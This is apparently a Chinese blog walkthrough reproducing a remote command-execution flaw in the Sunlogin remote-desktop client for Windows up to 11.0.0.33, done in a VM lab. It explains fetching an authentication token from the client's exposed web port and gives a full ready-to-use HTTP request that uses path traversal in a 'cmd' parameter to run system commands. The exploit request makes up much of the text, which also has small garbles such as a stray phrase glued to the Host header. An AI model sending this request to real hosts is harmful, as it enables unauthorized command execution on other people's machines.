向⽇葵RCE命令执⾏(Windows<=11.0.0.33)
前⾔
向⽇葵个⼈版企业版均受影响 for Windows <=11.0.0.33
SunloginClient 启动后会在 40000 以上随机开放⼀个web端⼝,认证有问题可以直接通过cgi-bin/rpc?action=verify-haras获取cid 执⾏回显rce
⼀、话不多说开始复现
这⾥⽤的是 vm虚拟机安装的win10系统
1. 我们先安装漏洞版本的向⽇葵也就是<=11.0.0.33版本的,
2. 打开向⽇葵,连接服务器成功才可以哦
3. 打开之后会⾃动开启⼀个端⼝(40000-60000)之间随机的,我们扫描⼀下端⼝(先查看安装向⽇葵电脑的ip哦),我们扫出来的ip端⼝是50038
4. 验证是否端⼝可⽤(也就是使得否可以利⽤漏洞,看⾃⼰怎么理解了)
执⾏curl 192.168.236.128:50573(也就是curl ip:端⼝)
提⽰{"success":false,"msg":"Verification failure"}就是可以利⽤的
这⾥⽤的是攻击机(也就是我的物理机)运⾏的脚本哦
6. 这⾥有数据包(EXP)直接拿到BP上⾯去⽤就⾏,注意:我们获取到的Token get替换到数据包最后⾯CID=后⾯的内容
GET /check?cmd=ping../../../../../../../../../../../windows/system32/whoami HTTP/1.1
curl是什么命令Host: 192.168.200.209:50915
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Cookie: CID=dmPqDgSa8jOYgp1Iu1U7l1HbRTVJwZL3
这⾥你的ip端⼝要改哦!
到这⾥MHcloud⼜要和你们说再见了,没错他复现完成了,还是⽤的别⼈写的EXP,我不管,拿到了就是我的哈哈哈,不过还得感谢⼤佬写的EXP!!万分感谢!
本⼈理念:菜也要菜的理直⽓壮!!
MHcloud⼀个对⽹络安全充满憧憬的⼩菜鸡

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。